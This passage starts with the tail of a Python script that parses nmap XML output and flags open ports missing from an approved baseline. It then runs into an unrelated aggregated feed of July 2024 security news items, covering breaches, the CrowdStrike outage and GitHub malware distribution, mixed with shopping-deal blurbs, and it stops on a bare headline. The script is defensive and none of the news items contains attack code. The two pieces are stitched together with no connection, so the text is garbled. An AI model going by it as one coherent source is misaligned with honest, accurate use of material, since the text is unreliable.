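) -> Tuple[Dict[str, Dict[int, str]], List[str]]:
    """Return (unexpected, unknown_hosts).

    unexpected: open ports the baseline does not approve, keyed by host.
    unknown_hosts: hosts that answered but have no baseline entry at all,
    which often indicates a forgotten or rogue system.
    """
    unexpected: Dict[str, Dict[int, str]] = {}
    unknown_hosts: List[str] = []
    for ip, ports in scan.items():
        if ip not in baseline:
            unknown_hosts.append(ip)
            continue
        extra = sorted(set(ports) - baseline[ip])
        if extra:
            unexpected[ip] = {p: ports[p] for p in extra}
    return unexpected, sorted(unknown_hosts)


if __name__ == "__main__":
    found, unknown = find_unexpected_exposure(parse_open_tcp_ports(SAMPLE_NMAP_XML), BASELINE)
    for ip, ports in found.items():
        for port, svc in ports.items():
            print(f"{ip}: tcp/{port} ({svc or 'unknown'}) is open but not in the baseline")
    for ip in unknown:
        print(f"{ip}: host is up but has no baseline entry")
```

Run against a real `nmap -oX scan.xml` file by reading it into `parse_open_tcp_ports`; the diff, not the raw port list, is what belongs in a report or a change ticket.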

2024-07-25 00:34:58

Michigan Medicine data breach impacted 56953 patients

A cyber attack against Michigan Medicine resulted in the compromise of the personal and health information of approximately 57,000 patients. The academic medical center of the University of Michigan, Michigan Medicine, suffered a data breach that impacted 56953 patients. The security incident exposed the personal and health information of the patients. Michigan Medicine notified patients […]

by Security Affairs

2024-07-24 23:24:16

Philippines Shuts Down Online Gambling In Effort to Curb Financial Scamming

In a bold move to address the country's growing concerns, President Ferdinand Marcos Jr. has announced a total ban on Philippine Offshore Gaming Operators (POGOs) in the Philippines. This decision comes after years of controversy and allegations of illegal activities linked to POGOs. In his third State of the Nation Address (SONA), Marcos emphasized the need to stop the "grave abuse and disrespect to our system of laws" and to put an end to the "panggulo" (nonsense) that has plagued the country. He also directed the Philippine Amusement and Gaming Corporation (PAGCOR) to wind down and cease POGO operations by the end of the year.

Philippines Government Helps Displaced Employees

As the ban takes effect, the Philippine government has vowed to help Filipino POGO workers find new jobs. Finance Secretary Ralph Recto assured that the government would assist Filipino POGO workers in finding new employment. "We have until the end of the year to ensure that all displaced Filipino workers will have new jobs," Recto said. He added that the Department of Finance would collaborate with the Department of Labor and Employment to provide reskilling and upskilling training. (Image source: pco.gov.ph) National Economic and Development Authority Secretary Arsenio Balisacan downplayed the economic impact of the ban, noting that POGOs contributed less than 0.5% to the country's GDP in 2022. He emphasized that the social and reputational costs of hosting POGOs outweigh their economic benefits. Other government agencies, such as the Department of Social Welfare and Development (DSWD) and the Department of Labor and Employment (DOLE), have also pledged to provide assistance to affected workers. The DSWD has indicated that it wants to convert shut-down POGO hubs into shelters for the individuals it reaches out to.

Addressing Social Concerns and Illegal Activities

The Department of the Interior and Local Government (DILG) has directed local government units (LGUs) to scrutinize documents of establishments as the first line of defense in granting business permits. The DILG chief has also emphasized the importance of coordination with proper authorities to ensure that only legitimate businesses are allowed to operate. The ban comes in response to numerous reports of criminal activities linked to POGOs, including financial scams, money laundering, human trafficking and violent crimes. Marcos acknowledged that while the ban would solve many problems, it wouldn't address all issues. Department of Social Welfare and Development Secretary Rex Gatchalian outlined plans to assist both Filipino and foreign workers affected by the ban. The government will provide temporary housing, cash aid and support for those wishing to start small businesses. In light of the ban, Interior Secretary Benjamin Abalos Jr. has directed local government units to scrutinize business permit applications more closely to prevent illegal operations from continuing under different guises. As the Philippines moves to implement this significant policy change, the government faces the challenge of balancing economic considerations with social welfare and national security concerns.

by The Cyber Express

2024-07-24 22:46:25

Stolen Documents From Pentagon IT Provider Leidos Leaked By Hackers

Hackers have leaked internal documents stolen from Leidos Holdings Inc., a major U.S. government IT services provider, according to a source familiar with the situation. The company recently discovered the issue and believes the documents were taken during a previously disclosed breach of a third-party system it used. Leidos, which serves clients including the Defense Department, Department of Homeland Security and NASA, is investigating the matter. The company's stock initially fell more than 4% in after-hours trading on the news before recovering most of its losses.

Leidos Leak Believed to Stem From Third-Party Breach

Leidos, formed in 2013 through the acquisition of Lockheed Martin Corp.'s IT business, was the largest federal IT contractor in the 2022 fiscal year, with $3.98 billion in contract obligations, according to Bloomberg Government data. The leaked documents are believed to have originated from a breach of a Diligent Corp. subsidiary, Steele Compliance Solutions. Leidos used Diligent's system to store information from internal investigations, as noted in a June 2023 Massachusetts filing. While some purportedly leaked files were visible on a cybercrime forum, their authenticity could not be independently verified. Though the original report does not directly mention the name of the cybercrime forum, it appears to be BreachForums. (Two screenshots; source: BreachForums.st) A Diligent spokesperson confirmed that the leak appears to stem from a 2022 hack affecting Steele Compliance Solutions, which it acquired in 2021. The incident impacted fewer than 15 customers, including Leidos, which was initially notified in November 2022. "We promptly notified impacted customers and took immediate corrective action to contain the incident," the Diligent spokesperson said.

Leidos maintains that the breach did not affect its network or any sensitive customer data. "We have confirmed that this stems from a previous incident affecting a third-party vendor for which all necessary notifications were made in 2023," a Leidos spokesperson stated.

Leidos Leak Impact and Implications

The company's extensive government contracts and the nature of the leaked documents raise concerns about potential security implications. However, the full extent of the breach and the sensitivity of the leaked information remain unclear. The company has sought to reassure its customers, including the Defense Department, the Department of Homeland Security, and NASA, that the breach did not affect its network or sensitive customer data. According to the Bloomberg article, the Pentagon, Department of Homeland Security and NASA had not yet responded to requests for comment on the incident. In another incident that occurred more than a decade ago, hackers had stolen over 24,000 files from a defense contractor associated with the Pentagon. While the Pentagon did not say which files had been stolen because of the secrecy surrounding their content, former Deputy Defense Secretary William J. Lynn III admitted during a speech that it involved some of the U.S.’s “most sensitive systems, including aircraft avionics, surveillance technologies.”

by The Cyber Express

2024-07-24 22:33:48

Cyber Insurance Won’t Cover Billions in CrowdStrike Losses

The massive CrowdStrike outage will cost Fortune 500 companies more than $5 billion – and 80-90% of that won’t be covered by cyber insurance policies, according to cloud monitoring and insurance provider Parametrix. Parametrix estimates that the outage that hit about 8.5 million Windows machines will cost Fortune 500 companies $5.4 billion – and that number doesn’t include Microsoft’s own costs in implementing fixes and getting machines back up and running. “The portion of the loss covered under cyber insurance policies is likely to be no more than 10% to 20%, due to many companies’ large risk retentions, and to low policy limits relative to the potential outage loss,” the insurer said in a statement released today. Smaller customers will make the total CrowdStrike losses even higher, and victims are unlikely to get much help from CrowdStrike, as the company’s terms and conditions limit damages to refunds.

Healthcare, Banking Hit Hardest by CrowdStrike Losses

Parametrix said a quarter of the Fortune 500 was impacted by the outage, which CrowdStrike has attributed to a bug in its validation software that allowed a faulty update to be released. All of the airlines in the Fortune 500 and 43% of retailer and wholesaler companies were hit by the flaw, which caused widespread Windows blue screen of death (BSOD) errors and required machines to be rebooted individually to be fixed. Roughly 75% of health and banking sector firms suffered direct costs, totaling more than $1 billion for banks and nearly $2 billion for healthcare companies. (Chart: CrowdStrike Financial Losses by Industry; source: Parametrix) Beyond primary financial losses, “CrowdStrike’s impact on critical services resulted in a cascade of operational delays affecting the Fortune 500 companies and their downstream entities,” the company said. Parametrix concluded that traditional industries relying on physical computers experienced longer recovery times, “which underlines the resilience and rapid recovery of cloud-based systems.”

CrowdStrike’s Customer Outreach Efforts Fall Flat

Many cybersecurity observers have praised CrowdStrike’s forthright discussion of the event and its aftermath, but widespread outages that included thousands of machines in many affected environments have left customers feeling disaffected in many cases, and the company’s outreach efforts – which have included food vouchers in some cases – have been criticized as inadequate. Microsoft security researcher Kevin Beaumont shared one image of a customer complaining that a $100 DoorDash offering was a paltry sum for an outage that hit more than 150,000 devices in the unnamed organization. (Image: CrowdStrike DoorDash customer complaint) The annual Pwnie Awards gave CrowdStrike an early award for the outage, just some of the snark and memes that have resulted from a top cybersecurity company making such a massive mistake. (Image: CrowdStrike Pwnie Award)

by The Cyber Express

2024-07-24 22:01:07

Small Businesses Need Default Security in Products Now

Small businesses are increasingly being targeted by cyberattackers. Why, then, are security features priced at a premium?

by Dark Reading

2024-07-24 21:48:44

Fighting Third-Party Risk With Threat Intelligence

With every new third-party provider and partner, an organization's attack surface grows. How, then, do enterprises use threat intelligence to enhance their third-party risk management efforts?

by Dark Reading

2024-07-24 21:27:04

Docker Patches Critical AuthZ Plugin Bypass Vulnerability Dating Back to 2018

The vulnerability, tagged as CVE-2024-41110 with a CVSS severity score of 10/10, was originally found and fixed in 2018. The post Docker Patches Critical AuthZ Plugin Bypass Vulnerability Dating Back to 2018 appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 21:25:32

Zest Security Aims to Resolve Cloud Risks

Cybersecurity startup Zest Security emerged from stealth with an AI-powered cloud risk resolution platform to reduce time from discovery to remediation.

by Dark Reading

2024-07-24 21:15:33

NSA releases top 10 tips to manage your cloud migration securely

Cloud environments are increasingly being targeted by malicious cyber actors, according to the National Security Agency (NSA).

by Barracuda

2024-07-24 21:00:23

Buy Microsoft Project Pro or Microsoft Visio Pro for $20 right now

Microsoft's project management solutions include timesheet support, org charts, and more to help you stay organized -- and they're on sale for 92% off for another few days.

by ZDNET Security

2024-07-24 20:49:37

U.S. CISA adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Internet Explorer and Twilio Authy bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the flaws added to the KEV catalog: CVE-2012-4792 (CVSS score of […]

by Security Affairs

2024-07-24 20:35:57

'Stargazer Goblin' Amasses Rogue GitHub Accounts to Spread Malware

The threat group uses its "Stargazers Ghost Network" to star, fork, and watch malicious repos to make them seem legitimate, all to distribute a variety of notorious information-stealers-as-a-service.

by Dark Reading

2024-07-24 20:34:31

From tee to trophy: Meet the 2024 Barracuda Championship winner

Nick Dunlap emerges as the champion of the 26th annual Barracuda Championship. Learn about his professional journey as a golf player in this piece.

by Barracuda

2024-07-24 20:30:23

Learn a new language with a Babbel subscription for 76% off right now

Save $459 on a Babbel Language Learning subscription and learn 14 new languages with this deal.

by ZDNET Security

2024-07-24 20:06:00

How my 4 favorite AI tools help me get more done at work

I've tested a lot of AI tools. These are the four I use almost daily to enhance my productivity.

by ZDNET Security

2024-07-24 20:00:24

The best external hard drives of 2024: Expert tested

I've rigorously evaluated the top external hard drives available today, to help you find the most reliable and cost-effective backup storage solution.

by ZDNET Security

2024-07-24 19:44:51

Meta Quest 3 is getting AI before Apple's Vision Pro does - here's how to enable it

Beyond answering basic questions, Meta AI on the Quest 3 headset will be able to analyze your outfit, find things to do, and more.

by ZDNET Security

2024-07-24 19:30:22

Sign up for a Costco membership and get a $40 gift card, free. Here's how

Don't miss this rare Costco deal that gives you a $40 store card with your Gold Star membership purchase -- effectively cutting the price down to just $20. (I bought one and highly recommend it.)

by ZDNET Security

2024-07-24 19:15:33

Telcos given extra time to retire 3G networks

Two mobile operators in Singapore are granted more time to move their 3G customers to newer networks, while a third telco already has done so on schedule.

by ZDNET Security

2024-07-24 19:10:12

Venture Capital: The New National Security Risk

U.S. national security agencies are warning technology startups to be wary of foreign venture capital investments that may be attempts to steal secrets. The warning, issued today by the Director of National Intelligence’s National Counterintelligence and Security Center (NCSC) and three other agencies, notes that concern about startup investments by the People’s Republic of China (PRC) has been an issue since at least 2018, but recent events have heightened concerns that the PRC is using VC investments to attempt to gain access to AI technology and other sensitive intellectual property (IP). The guidance – and the threat of lost business and deals if national security risks are later discovered – puts startups in the difficult position of judging investor ownership at the same time that they may be seeking a critical financial lifeline. The NCSC document spells out warning signs to look for in a venture investor, and also shares some horror stories of stolen startup intellectual property.

IDG Capital, Other Venture Capital Threats Cited

The warning from NCSC, DNI’s Office of Economic Security and Emerging Technologies (OESET), and the Air Force and Navy criminal investigative services, notes that in January 2024, the U.S. Department of Defense (DoD) added China-based private equity firm IDG Capital to its list of “‘Chinese military companies’ operating directly or indirectly in the U.S.” IDG Capital, which has invested in more than 1,600 companies, including several in the U.S., denies DoD’s claims. The agencies’ warning cites a few examples where a venture investment masked hidden national security risks. Last year, the CEO of a U.S. startup that is suing defendants in China for trade secret theft testified before Congress that some China-based VC firms may target and pay employees of U.S. startups to acquire technology, then fund competitors in China who try to monetize the stolen technology. Some U.S. and European firms have claimed that China-based investors offered them investments, then withdrew the offers after obtaining their proprietary data in the due diligence process. One U.K. firm, after agreeing to a takeover by an investor in China, began transferring technology in exchange for part of the acquisition price. The investor later abandoned the acquisition, and the U.K. firm faced bankruptcy after sharing its IP. In addition to stolen IP and lost market share, the agencies note that startups can also be denied U.S. government contracts or small business funding if foreign threat actors have been found to have a presence in their firms.

Warning Signs of Foreign VC Involvement – And Defensive Steps

The NCSC document acknowledges the difficulty of determining “the ownership and intent of foreign investors,” and offers some warning signs of foreign investment and some defensive steps to take. Foreign investors may structure investments to avoid scrutiny from the Committee on Foreign Investment in the United States (CFIUS), which reviews mergers, acquisitions, and investments that may have national security implications. They may route investments through intermediaries in the U.S. or other countries, and use minority and limited partner investments. Some of the tactics that could be warning signs of foreign threat actors may also be routine legal moves, complicating assessment efforts. These include complex ownership, including separate entities that share key personnel, or shell companies “with no substantive purpose.” Incorporation in offshore locations lacking transparency and oversight is another such tactic. Investments through funds, partners, or intermediaries in the U.S. or other countries can be another potential warning sign, as can Limited Partner Investments and requests for proprietary or other sensitive data. “Startups should be alert to intrusive requests for sensitive data,” the document notes. Before seeking investments, the agencies advise startups to “identify and compartmentalize your company’s ‘crown jewels’” with physical and virtual protections and access restrictions. A risk manager should be empowered to protect assets, and startups should make sure that legal and contractual agreements “are enforceable in the investor’s home country.” Startups with concerns or tips about potential foreign investments with national security implications should contact CFIUS, the FBI or DoD, the guidance notes.

by The Cyber Express

2024-07-24 19:00:23

HHS audit finds serious gaps in cloud security at agency office

Penetration testers were able to access sensitive information stored by the HHS Office of the Secretary.

by SC Media

2024-07-24 18:50:04

Cyberattackers Exploit Microsoft SmartScreen Bug in Stealer Campaign

The good news: Only organizations far behind on standard Windows patching have anything to worry about.

by Dark Reading

2024-07-24 18:50:03

Google Chrome’s New Defenses Against Malicious Downloads

Chrome has quietly bolstered its defenses against malicious downloads, leveraging AI and user behavior insights to thwart a growing array of threats. Google's browser has introduced a more nuanced warning system, distinguishing between "suspicious" and "dangerous" files, and automating deep scans for enhanced protection of users. The move aims to pre-empt threats like cookie theft malware hidden within encrypted archives. The latest changes were introduced after Chrome recently updated its user interface. "Taking advantage of the additional space available in the new downloads UI, we have replaced our previous warning messages with more detailed ones that convey more nuance about the nature of the danger and can help users make more informed decisions," Google's security team said. (Image: Differentiation between "Suspicious" and "Dangerous" warnings; source: Google Security Blog)

Chrome Gets AI, Machine Learning, Deep Scans

By leveraging AI and machine learning, Chrome offers more granular warnings, automatic deep scans, and protections against encrypted archive-based attacks. The redesigned download experience offers more than just aesthetic improvements. It’s a tactical shift in Google’s defense strategy. By providing detailed warnings, Chrome hopes to empower users to make informed decisions about file downloads. The two-tier warning system, backed by AI-powered malware verdicts from Google Safe Browsing, adds granularity to threat assessments. The results are tangible: fewer ignored warnings and quicker responses to threats.

Enhanced Protection Against Malicious Downloads

A particularly intriguing development is the expansion of automatic deep scans for Enhanced Protection users. While this might sound like a minor tweak, it's a significant step forward. By proactively scanning suspicious files, Chrome can catch never-before-seen malware and disrupt attack chains early. The claim that files sent for deep scanning are over 50 times more likely to be flagged as malware underscores the efficacy of this approach. However, attackers are not standing still. A disturbing trend involves packaging malware in encrypted archives, a technique that evades traditional detection methods. Chrome counters this by prompting users to enter passwords for suspicious archives. While this adds a layer of complexity, it's a necessary evil to prevent the spread of concealed threats. (Image: Prompt to enter a file password to send an encrypted file for a malware scan; source: Google Security Blog)

Chrome Standard Protections

For users on the default Standard Protection mode, Chrome offers a more limited, but still valuable, defense. It prompts password entry for suspicious encrypted archives, but instead of sending the file for deep scanning, it merely checks the archive's metadata against known threats. While this approach is less robust, it provides a baseline of protection for the majority of users. Chrome’s enhanced download protections represent a significant stride in the ongoing battle against malware. By combining AI-driven analysis, user education, and proactive defense, Google has created a formidable barrier against malicious downloads. While these enhancements are commendable, the evolving threat landscape demands continuous innovation. As Google's Threat Analysis Group and security researchers worldwide uncover new tactics, Chrome must adapt accordingly. The success of these new defenses will ultimately be determined by their ability to stay ahead of a relentless adversary.

by The Cyber Express

2024-07-24 18:44:07

Meet Stability AI's Stable Video 4D, a nuanced take on AI video generation

With its first video-to-video AI model, Stability AI pushes the boundaries for AI video generation even further.

by ZDNET Security

2024-07-24 18:44:05

Upgrade to Windows 11 Pro for $25 right now

Get a lifetime Windows 11 Pro license with more productivity features that will help you get things done -- and it's 87% off with this deal.

by ZDNET Security

2024-07-24 18:40:54

How to watch the 2024 Summer Olympics: Every streaming option

The Summer Olympics start this Friday. Here's how to watch the opening ceremony and the games, in some cases for free.

by ZDNET Security

2024-07-24 18:36:01

I tested the 3 best VPNs for streaming ahead of the Summer Olympics

The Summer Olympics have arrived. With the right VPN service, you can stream the games and watch all the action, no matter where you are in the world.

by ZDNET Security

2024-07-24 18:24:03

Zest Security Aims to Resolve, Not Just Mitigate Cloud Risks

Zest Security emerged from stealth with $5 million funding and an AI-powered platform that resolves the root source of risk in the cloud. The post Zest Security Aims to Resolve, Not Just Mitigate Cloud Risks appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 18:18:54

Strategic Insights: The Importance of Dark Web Monitoring for CEOs

Security experts have stressed the importance of dark web monitoring for CEOs of businesses and enterprises of all sizes as an essential measure to prioritize the safety and integrity of their organization''s digital presence. Password and data breaches shared on the dark web and in cybercriminal communities have become a common occurrence, leaving businesses vulnerable to severe consequences, including stolen bank accounts and identity theft. To combat this threat, dark web monitoring is a proactive option to help identify, detect and mitigate potential breaches before they escalate into embarrassing major security incidents. CEOs Guide to Dark Web Monitoring The dark web is a small part of the deep web, which is generally considered an unindexed sub-layer of the internet, ignored by or inaccessible to conventional search engines. This anonymous environment is a hub for illegal activities, including the commission and sale of sensitive data such as digital credentials and records. Dark web monitoring is a specialized process that involves searching for and monitoring the spread of records related to organization or entity information across the dark web. Using advanced algorithms and techniques, dark web monitoring tools provide enhanced detection capabilities, allowing businesses to stay ahead of cyber threats. The financial implications of a cyber attack can be severe. In 2020, DSG Retail Limited was fined £500,000 by the UK''s Information Commissioner''s Office after a point-of-sale system breach affected 14 million people, for example. A study conducted at King’s College London revealed that over 60% of more than 2,700 darknet sites were found to host illicit content facilitating criminal activity. It''s essential for CEOs to understand the techniques and methods cybercriminals use to steal data, such as phishing, malware, and keylogging, to recognize and prevent these threats. For CEOs, the stakes are high. 
A single compromised password can lead to devastating consequences, from financial losses to reputational damage. With 80% of individuals reusing passwords across multiple accounts, the risk of a breach extends far beyond a single compromised system. Quick response by CEOs can be an important factor in limiting damage, and that's where dark web monitoring comes in.

The Sale of Ransomware and Malware

The dark web is a hub for the sale of ransomware malware that is used in threat campaigns. These attacks can be devastating for businesses, such as the 2017 WannaCry attack on the UK's NHS that reportedly led to it losing £92 million as well as the cancellation of over 19,000 appointments. In the same year, shipping giant A.P. Moller-Maersk suffered losses of between $200-$300 million due to the NotPetya ransomware attack, which rendered apps, laptops, and servers useless. Dark web monitoring can help counter the threat posed by the sale of such services on dark web forums.

The Sale of Business Data

If your business is hacked and your data stolen, it may well end up for sale on the dark web, making it critical to have a suitable platform providing dark web threat intelligence for corporate leaders. Hackers also sell access to breached company databases, leaving them open to the theft of everything from financial information to employees' personal details. Last year, Kaspersky researchers observed almost 40,000 dark web posts about the sale of internal corporate information, a 16% increase compared to the previous year.

The Sale of Credit Card Details

It's estimated that over 23 million credit cards are offered for sale on the dark web, which may have come from a variety of sources, including online stores' checkout processes. Marketplaces called Automated Vending Carts (AVCs) are used to sell credit card details without the buyer and seller needing to interact.
Importance of Dark Web Monitoring for CEOs

Dark web monitoring offers a strategic advantage in the ongoing battle against cybercrime. Here are some benefits of dark web monitoring for business executives.

- Detect breaches early: Identify compromised credentials before they're exploited.
- Assess vulnerabilities: Gain insights into potential weak points in security protocols.
- Enhance incident response: React swiftly to emerging threats with actionable intelligence.
- Protect executive data: Organizations can place special focus on protecting executive data through dark web monitoring tools.

Implementing a robust dark web monitoring program allows CEOs to stay ahead of potential threats, protecting their company's assets and reputation. This is crucial given the rise of ransomware-as-a-service and malware-as-a-service packages on the dark web, which enable even non-technical criminals to launch sophisticated attacks.

Building a Security Strategy

While dark web monitoring is a powerful tool, it's just one piece of a comprehensive cybersecurity strategy. CEOs should consider:

- Dark web monitoring: Reliable dark web risk and monitoring solutions for CEOs such as Cyble Vision or Cyble Darkweb Intelligence can be integrated into broader security strategies to provide dark web threat intelligence for corporate leaders.
- Employee education: Train staff to recognize and report potential security threats or respond to claims of breach or compromise. Dedicated staff should feel encouraged to report strategic insights on dark web threats for executives.
- Multi-factor authentication: Implement additional layers of security beyond passwords to protect against leaked credentials offered for sale on the dark web.
- Regular security audits: Continuously assess and improve organizational defenses.

By combining dark web monitoring with these broader security measures, CEOs can create a robust defense against evolving cyber threats.
- Leverage AI tools in security implementation: Incorporate AI-powered dark web monitoring solutions like Cyble’s award-winning cyber threat intelligence platform to make use of rich automated feeds. These automated feeds can help in updating dark web monitoring strategies for company CEOs.

In an era where data is a precious commodity, dark web monitoring can give CEOs critical insights to safeguard their organizations, and the peace of mind that rapid insight and response can bring.

by The Cyber Express

2024-07-24 18:17:00

How to enable Slack notifications on your Apple Watch

Learn how to always stay connected to your team without having to carry your iPhone everywhere. We step you through all the settings you'll need to make it work.

by ZDNET Security

2024-07-24 18:09:17

The best MagSafe battery packs of 2024: Expert tested and reviewed

We tested the best MagSafe battery packs from Baseus, Anker, Belkin, and more to keep your phone's battery boosted everywhere you go.

by ZDNET Security

2024-07-24 17:58:59

Over 3,000 GitHub accounts used by malware distribution service

Threat actors known as 'Stargazer Goblin' have created a malware Distribution-as-a-Service (DaaS) from over 3,000 fake accounts on GitHub that push information-stealing malware. [...]

by BleepingComputer

2024-07-24 17:57:48

The best portable jump starters of 2024: Expert recommended

We tested and researched the best portable jump starters to help you build the perfect roadside emergency kit for your car, truck, or SUV.

by ZDNET Security

2024-07-24 17:54:00

One of the best E Ink tablets I've tested is not a ReMarkable or Kindle Paperwhite

The Onyx Boox Page offers just the right amount of capabilities and limitations for an e-reader, and it's still better than the Kindle Paperwhite.

by ZDNET Security

2024-07-24 17:53:06

Rhysida using Oyster Backdoor to deliver ransomware

In a recent attack, Rhysida used a new variant of the Oyster backdoor, also known as Broomstick.

by ThreatDown

2024-07-24 17:49:14

Microsoft in 2024: Top Stories (So Far)

Our most-read articles about Microsoft explore the company’s AI endeavors, formidable security hurdles, and ethical challenges.

by ITPro Today

2024-07-24 17:39:06

TracFone will pay $16 million to settle FCC data breach investigation

Prepay wireless provider TracFone has been slapped on the wrist to the tune of $16 million for insufficient customer data protection

by Malwarebytes Labs

2024-07-24 17:31:17

Hackers bypass Windows SmartScreen flaw to launch malware

Cybercriminals are stepping up efforts to bypass a critical component in Microsoft Defender in order to covertly install malware

by SC Media

2024-07-24 17:31:00

How a Trust Center Solves Your Security Questionnaire Problem

Security questionnaires aren’t just an inconvenience — they’re a recurring problem for security and sales teams. They bleed time from organizations, filling the schedules of professionals with monotonous, automatable work. But what if there were a way to reduce or even altogether eliminate security questionnaires? The root problem isn’t a lack of great questionnaire products — it’s the

by The Hacker News

2024-07-24 17:29:21

Microsoft’s AI Assistants Will Revolutionize the Office — One Day

Early adopters say deploying the company’s Copilot bots requires cleaning up corporate data and lots of employee training.

by ITPro Today

2024-07-24 17:29:13

Cybersecurity Awareness Month 2024 Kick-off

It's been 20 years since the first Cybersecurity Awareness Month, and now is the ideal moment to reflect on decades of success and what challenges lie ahead of us. Since 2004, every October has been dedicated to keeping us all safe and secure online. There is always more to do. How can the public and private sectors continue to work together to secure technology, protect critical infrastructure, and bring more workers, consumers, companies, and organizations into a safer future? Elected officials, government leaders, and industry executives will join together this October to work toward building a safer connected world.

by National Cybersecurity Alliance

2024-07-24 17:29:00

Telegram App Flaw Exploited to Spread Malware Hidden in Videos

A zero-day security flaw in Telegram's mobile app for Android called EvilVideo made it possible for attackers to send malicious files disguised as harmless-looking videos. The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11.

by The Hacker News

2024-07-24 17:08:14

Dazz Scores Hefty $50M Investment for AI-Powered Risk Remediation Tech

The new financing brings the total raised by Dazz to $110 million as investors double down on bets in the cloud security remediation space.

by SecurityWeek

2024-07-24 17:05:30

OpenAI's budget GPT-4o mini model is now cheaper to fine-tune, too

Re-training the new budget GPT is less than half the cost of doing the same with OpenAI's older models.

by ZDNET Security

2024-07-24 17:00:55

The best headphones for working out: Expert tested and reviewed

We've run, swum, hiked, and biked in these headphones and earbuds to help you choose the best headphones for working out.

by ZDNET Security

2024-07-24 16:58:00

This versatile Dell laptop surprised me with 3 standout features

Dell's 2024 Inspiron Plus 16 sees some hardware upgrades for AI readiness, while preserving the series' identity as a versatile and dependable machine.

by ZDNET Security

2024-07-24 16:50:05

Hamster Kombat Players Threatened by Spyware & Infostealers

Players can only access the game by first joining its Telegram channel, with some going astray in copycat channels with hidden malware.

by Dark Reading

2024-07-24 16:48:00

Poll: CISOs stick with CrowdStrike, share lessons learned

The CyberRisk Collaborative convened a Rapid Action Meeting to allow members a forum to discuss the incident, share information, and obtain advice from fellow members.

by SC Media

2024-07-24 16:34:03

CrowdStrike update leads to massive IT outage worldwide

A faulty update from cybersecurity firm CrowdStrike for Microsoft software on July 19 led to a massive IT outage worldwide that affected an estimated 8.5 million Windows devices.

by SC Media

2024-07-24 16:26:03

Ransomware targeting FinServ: What you need to know

The median ransom demand in financial services is $2 million.

by SC Media

2024-07-24 16:20:02

This AI-powered Linux terminal app can help you learn how to use commands

If you're new to the Linux command line, AI Shell is a powerful tool to check out.

by ZDNET Security

2024-07-24 16:12:37

Exploiting Compliance: Ransomware Gang Tactics

Understand the methods ransomware gangs use to exploit security compliance and how Darktrace's AI can mitigate these threats.

by Darktrace

2024-07-24 15:47:35

Pro-Russian NoName Targets Spain

NoName announced a new operation, this time against Spain. The attack targeted multiple websites, including those of the Constitutional Court of Spain and the Madrid […]

by Privacy Affairs

2024-07-24 15:44:41

AS-REP roasting detection

Learn how to detect AS-REP roasting attacks in part two of a special five-part series on critical Active Directory (AD) attack detections & misconfigurations.

by Hack The Box Blog

2024-07-24 15:41:13

CrowdStrike offers a $10 apology gift card to say sorry for outage

Several people who received the CrowdStrike offer found that the gift card didn't work, while others got an error saying the voucher had been canceled.

by TechCrunch

2024-07-24 15:31:00

How to Reduce SaaS Spend and Risk Without Impacting Productivity

There is one simple driver behind the modern explosion in SaaS adoption: productivity. We have reached an era where purpose-built tools exist for almost every aspect of modern business and it’s incredibly easy (and tempting) for your workforce to adopt these tools without going through the formal IT approval and procurement process. But this trend has also increased the attack surface—and with

by The Hacker News

2024-07-24 15:28:20

Darktrace: Investigating Widespread Trojan Infections

Discover how Darktrace expedites the investigation of widespread Trojan infections, enhancing cybersecurity and response times.

by Darktrace

2024-07-24 15:13:00

Patchwork Hackers Target Bhutan with Advanced Brute Ratel C4 Tool

The threat actor known as Patchwork has been linked to a cyber attack targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell. The development marks the first time the adversary has been observed using the red teaming software, the Knownsec 404 Team said in an analysis published last week. The activity cluster, also

by The Hacker News

2024-07-24 15:00:03

Docker fixes critical 5-year old authentication bypass flaw

Docker has issued security updates to address a critical vulnerability impacting certain versions of Docker Engine that could allow an attacker to bypass authorization plugins (AuthZ) under certain circumstances. [...]

by BleepingComputer

2024-07-24 14:52:19

Is GhostEmperor Back? Sygnia Finds Clues in Recent Cyber Incident

Sygnia discovered what it believes to be a variant of the GhostEmperor infection chain leading to the Demodex rootkit, which was first seen and described in 2021.

by SecurityWeek

2024-07-24 14:38:31

AT&T outage blocked more than 25,000 emergency calls, says FCC

FCC report says a network misconfiguration by an AT&T Mobility employee caused the 12-hour outage.

by SC Media

2024-07-24 14:28:12

Network of ghost GitHub accounts successfully distributes malware

Check Point researchers have unearthed an extensive network of GitHub accounts that they believe provides malware and phishing link Distribution-as-a-Service. Set up and operated by a threat group the researchers dubbed as Stargazer Goblin, the “Stargazers Ghost Network” is estimated to encompass over 3,000 active accounts, some created by the group and others hijacked. “The network distributed all sorts of malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine,” they found. The set-up …

by Help Net Security

2024-07-24 14:26:54

CrowdStrike Blames Crash on Buggy Security Content Update

CrowdStrike vows to provide customers with greater control over the delivery of future content updates by allowing granular selection of when and where these updates are deployed.

by Dark Reading

2024-07-24 14:05:18

Mimecast Announces Acquisition of Code42, Expands Human Risk Management Platform with Visibility into Insider Threats

Mimecast, a leading global human risk management platform, announced today the acquisition of Code42, a leader in insider threat and data loss protection. Expanding on the success of their existing technology partnership, this acquisition marks a critical step in Mimecast’s strategy to revolutionize how organizations manage and mitigate human-centered security risks. Financial terms of the deal […]

by IT Security Guru

2024-07-24 14:05:11

Microsoft fixes bug behind Windows 10 Connected Cache delivery issues

Microsoft has fixed a known Windows 10 update issue that broke Microsoft Connected Cache (MCC) node discovery on enterprise networks. [...]

by BleepingComputer

2024-07-24 14:02:00

CrowdStrike Explains Friday Incident Crashing Millions of Windows Devices

Cybersecurity firm CrowdStrike on Wednesday blamed an issue in its validation system for causing millions of Windows devices to crash as part of a widespread outage late last week. "On Friday, July 19, 2024 at 04:09 UTC, as part of regular operations, CrowdStrike released a content configuration update for the Windows sensor to gather telemetry on possible novel threat techniques," the company

by The Hacker News

2024-07-24 14:00:00

Navigating the Complex Landscape of Web Browser Security

The more we use the cloud, the more maintaining browser security becomes crucial.

by Dark Reading

2024-07-24 13:58:05

Indian Firm Linked to Fake DMCA Notices Silencing Journalists

